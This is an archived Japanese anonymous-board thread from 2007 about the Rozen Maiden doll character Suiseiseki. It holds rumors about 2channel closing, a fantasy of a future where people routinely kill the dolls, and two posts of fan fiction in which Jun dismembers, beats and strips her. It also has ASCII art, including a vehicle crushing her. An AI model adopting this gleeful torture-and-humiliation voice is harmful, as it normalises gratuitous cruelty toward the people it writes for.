562 :名無しちゃん…電波届いた?:2007/01/15(月) 12:42:29
・ドメインとは別にひろゆきが2chやめるコピペは偽ひろゆきのネタ
・テクトイックス・タブロイドは嘘ニュースサイト
・15日閉鎖は2ちゃんねるプロバイダー
・今回の閉鎖と2ちゃんねるプロバイダーのサービス終了は無関係


コレ見てなんだか安心しました。
嘘か誠かはともかく、お騒がせしてすいませんでしたm(__)m

糞翠と柔道の投げ技の練習したいお^^
でも、糞翠にはおらのこと投げさせないお^^
糞翠が気絶するまでずっとおらのターンだお〇≧▽≦〇

563 :名無しちゃん…電波届いた?:2007/01/15(月) 23:14:41
>>562
よく考えてみればひろゆき氏が2chという一大コンテンツを手放す筈ないですもんね。
でもにくちゃんねる閉鎖といい2ちゃんねるプロバイダー終了といい少し寂しいですね・・・

タイムマシンで未来に行って来た。
未来では店で普通に翠星石が買える。
どこの店先や露天でも大量の翠星石たちが
「すこやかに〜のびやかに〜」「〜ですぅ」
とか喚いてる。
人々は毎日のように翠星石を買い、そして殺す。
翠星石を殺すことは未来では当たり前のことであり、人々は老若男女問わず何のためらいもなく翠星石を殺す。
俺はストレスすべてを翠星石にぶつけているので未来では犯罪が少ないということを、
ニコニコしながら翠星石の首をねじきる御隠居さんから聞いた。
未来では翠星石を大量に虐待虐殺したことが社会で評価され、成功をつかむことができるので、
親たちは競って子供を翠星石屠殺塾に通わせ、将来翠星石をジェノサイドするようにさせる。
塾に通えない貧しい家の子供でも将来破壊された翠星石をリサイクルして再び市場に供給する業者になれる。
そんな翠星石虐待虐殺者には理想社会。

そんな夢みたよ。俺も翠星石を大量虐殺してぇw

564 :名無しちゃん…電波届いた?:2007/01/19(金) 20:02:59
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□■■■■■□■■■■■□□□■■■■■■■□□□■■■■■■■■■■■□
□□■□□■□□■□□■□□□■□□□□□■□□□□□□□■□□□□□□□
□□□■□■□□□■□■□□□■■■■■■■□□□□□□□■□□□□□□□
□■■□□■□■■□□■□□□■□□□□□■□□□□□□■□□□□□□□□
□□□□□□■□□□□□□□□■■■■■■■□□□□□□■□□□□□□□□
□□■■■■■■■■■□□□■□□□■□□□□□□□□■■■■■■■■□□
□□□□■□□□■□□□□□■■■■■■■■■□□□■□■□□□□□■□□
□□□■□■□■□■□□□■□□□□■□□□□□□■□□■□□□□□■□□
□■■■■■■■■■■■□□□■■■■■■■□□□□□□■□□□□□■□□
□□□□□□■□□□□□□□□□□□■□□□□□□□□□■□□□□□■□□
□□□□□□■□□□□□□■■■■■■■■■■■□□□□■■■■■■■□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□■□□□■□□□□□□□■■■■□□□□□□□□□□□□□□□□
□□■■■■■■■■■■■□□□□□□□□□□□□□□□□□■□□□□□□
□□□□□■□□□■□□□□□□□□□□□□□□□□□□□□■□□□□□□
□□■■■■■□■■■■■□□■■■■■■■□□□□□□□□■□□□□□□
□□■□□□■□■□□□■□□□□□□□■□□□□□□□□□■□□□□□□
□□■■■■■□■■■■■□□□□□□■□□□□□□□□□□■□□□□□□
□□■□□□■□■□□□■□□□□□■■□□□□□□□□□□□□□□□□□
□□■□□□■□■■■■■□□□□■□□■□□□□□□□□□□□□□□□□
□□■■■■■□■□□□■□□□■□□□■□□□□□□□□□■□□□□□□
□□□□□□□□■□□□■□□■□□□□■□□□□□□□□□■□□□□□□
□□□□□□□■□□□■■□■□□□□□□■■■□□□□□□□□□□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□


565 :名無しちゃん…電波届いた?:2007/01/21(日) 15:20:50
>>564
こういう輩はホントウザイわw

566 :名無しちゃん…電波届いた?:2007/01/21(日) 15:25:33
翠星石のぜんまいをまく前に四肢切断したらどうなるのだろう?

「あれ?翠星石の手足がなくなっているですぅ!」
「うぅ…グスン…誰がこんな酷い事をするです…」
するとそこへジュンがやって来た。
「ジュン!翠星石の手足がぁ〜うぅ…痛いですぅ!」
両手両足を切断され、芋虫状態で身体をくねらせるその醜悪な姿は、ジュンの怒りと憎悪をかき立てるのだった。
「うぜえんだよ!クソ人形が!」
バキ!手足がなくなった翠星石を蹴り飛ばすジュン。
「い、痛いですぅ!ジュン!翠星石が何をしたというんですかぁ!」
「何をしたかの問題じゃない!僕は芋虫は必要ないんだ!」
「ひどいですぅ!翠星石は芋虫なんかじゃないですぅ!」
「じゃあお前は芋虫以下のジャンクだ!キモいんんだよ!」
「翠星石はキモくなんかないですぅ!」
どうやら翠星石は「手足」がなくなった以外はジャンクになった自覚が全くないようだ。
「うるさい!その性格喋り方がキモいんだよ!」
「翠星石は誇り高い薔薇乙女人形ですぅ!決してジャンクでも芋虫でもないですぅ!!」
涙目、半狂乱で喚く糞ミドリ。
次の瞬間、ジュンは翠星石の顔面を渾身の力を込めて殴った。
グシャ!
翠星石の顔面中央は大きく陥没し、醜く歪んでしまった。
「ふぐぅ…痛い!痛いですぅ!痛いですよ…うぅ」
紅緑のオッドアイから涙が溢れ出る。
「おい!糞ミドリ!いい事を教えてやる。さっきお前がゼンマイ切れで眠ってた時に僕がお前の手足を切断してやったのさ!感謝しろよ。」
ジュンは翠星石の胸倉を掴みながら言った。
「うぅ…どうして…こんな事するですぅ…ジュン…翠星石はジュンの事を…ううグスン…」
密かに想いを寄せるジュンの非情な仕打ちに、ただ涙する翠星石だった…。

567 :名無しちゃん…電波届いた?:2007/01/21(日) 15:26:22
「どうしてかって?お前の生意気な毒舌を封じるためさ!ジャンクにして劣等感を味あわせれば大人しくなると思ったんだよ!」
「たったそれだけの理由ですかぁ!ひ・ひどいですぅ!翠星石の手足を返しやがれですぅ!」
「まだ僕にそんな口を聞くのか?もっと痛い目にあわないとわからないようだな!」
翠星石を掴み縄で縛りはじめるジュン。
「痛いですぅ!翠星石を縛るなですぅ!さっさとほどきやがれですぅ!」
「僕にそんな口を聞いた罰だ!覚悟しろよ!」
翠星石の服を脱がし下着も剥ぎ取ったジュン。
「服を脱がすなんて変態!最低ですぅ!」
ジュンは泣き喚く翠星石を家の門の外の通りに放り出した。
「いやぁぁ!何するですぅ!」
「ふん」
無視して家の中にもどるジュン。
「ま、待つです!こんな姿の翠星石を置いていくなですぅ!」
だがジュンは戻ってこなかった。
「ジュン〜ひどいですよお!うわあああん!!!」
道行く人々が四肢がない喚く裸の人形を見て気味悪そうに避けて通るのにもかまわず、
涙と鼻水とヨダレをまき散らしながら翠星石は泣き叫び続けるのだった。

568 :名無しちゃん…電波届いた?:2007/01/22(月) 21:35:53

         /   /ヘ/  / /   /    /   //  /  / ヽ  \       \ \
        ./ _/ /  / /   /    /  / /  /   ∧_ヽ   \     ヽ.  ヽ
       // /! /  .l  l  /,.-‐'フフヽ.//  /   /´ヽヽ `>.、 .!       ',`ヽ 〉
        /   / |/    |  l// // /.: / ノ   /. :.:.ヽ \\ `ト、    |  | /
        {   ./ ||     l/  /ン-‐<、 ://:/  ./: :,ィ─ヽ-\ヽ. | |   |  |′
         \、.--|l-‐''"_,. -‐''",. =,=¬ミ、/: : :/  /: : : ノ゙,ニ==ミ、 | |   |  |
        /  ̄|| ̄   {: :く   ト-'  }  : : / ./: : : : : ト-'   } // /   j l !
        /   .!',      \:.` ゝ -‐'  .//      ー--  ./ /   /j | /
         /     ', ヽ   \ゝ、        ノ : : !           ノ/  .//ノ'
       ./    .∧ \   \                  -┐ ∠ -‐''" /     ヒッヒッヒ
       /     /,ハ = ゝヘ、_  ゝ、               __ノ)      /〃/
     /     //  ヽ〃 ヾ ヽ ̄ ̄   、_,.. -−'' ´ ̄   /     /</
   /    ,r'"´ ̄了ゝ、rー、 ヽ      ` ー──‐ '' ´     /liヾ/
  /    / ゝ, -‐'7`ーイ__.」、  \         ー          /   |
/   , f´ ̄/   /  ノ/ヽゝン‐.、V丶、              /|     |
   / 之/   /  /   ヽ ヽノ1ヽ-、.`丶、    _,. -‐'"´  /|ヾ 「l〃|
  / 「 /     / /      ', | ヽ \    ̄   /   / |= =l
/  .ゝ/     //       .i l , -イ   ヽ. ヽ     ,イヽ /  |〃il ヾl
   ,r/    /        || L.、|   l  `丶、 f |  `ヽ、 |     !
  /./     /           || ヽjヾ||〃l  ,. ‐-、ヽl   _  \|      ヽ
/ /     /         || ノj= =|/ , --ヘ}⌒}´_\  \ 、 ヾ r ヽ


569 :名無しちゃん…電波届いた?:2007/01/22(月) 21:44:12
>>568
おすすめ2ちゃんねる厨乙w

570 :名無しちゃん…電波届いた?:2007/01/25(木) 01:14:25
                  ノノ~殺~ヾ
                  ||Ф.」Ф|| 罪深いメス豚はSATSUGAIしてくれるわあ!
                  |||ト⇔イ|||
                []  /      ヽノ , _|_,
               ||__|__.   つ¶つ¶__| __
          (( ../ ̄:l:  .―:l:――――:l:/___ヽ,―、_
             |  :|:./ E:|: EEEEl  :|:|:   :  ̄ ̄||`l
            / ̄ ̄ヽ ̄ヽ DMC建機 .:|:|:__:___||._|    ゴロゴロ……
     ((((((  ./  ,●、 ヽ ヽ77777 .|:|   l, ―┴、┴==―、
           | ●|  |● ..|  |/////// :|:| /     ヽ ..ヽヽ .ヽ
     ((((((( ヽ  `●'  .|  |====:|:| |====l⊂  つ| ← 翠星石
   プチ プチ プチッヽ____/_/ ̄ ̄ ̄ ̄ ̄~'ヽ_____/ /_/ /

352 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)